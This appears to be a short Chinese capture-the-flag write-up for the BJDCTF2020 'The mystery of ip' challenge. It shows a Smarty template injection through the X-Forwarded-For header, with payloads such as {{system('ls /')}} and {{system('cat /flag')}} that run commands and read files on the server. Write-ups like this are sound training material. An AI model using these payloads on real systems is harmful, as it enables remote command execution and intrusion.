[BJDCTF2020]The mystery of ip
hint页面的源代码里发现提示
应该是和IP相关,有可能用到XFF请求头,遂用BP抓包
修改了XFF之后,被成功执行,XFF可控,代码是php代码,推测:
PHP可能存在Twig模版注入漏洞
Smarty模板的SSTI漏洞(主要为Flask存在Jinjia2模版注入漏洞)
添加模板算式,{{7*7}}成功执行
尝试是否能执行命令:X-Forwarded-For:{{system('ls')}}
随后改为{{system('ls /')}}发现flag文件
接着改为{{system('cat /flag')}}得到flag
标签:mystery,ip,system,XFF,flag,BJDCTF2020 From: https://www.cnblogs.com/fishjumpriver/p/18001760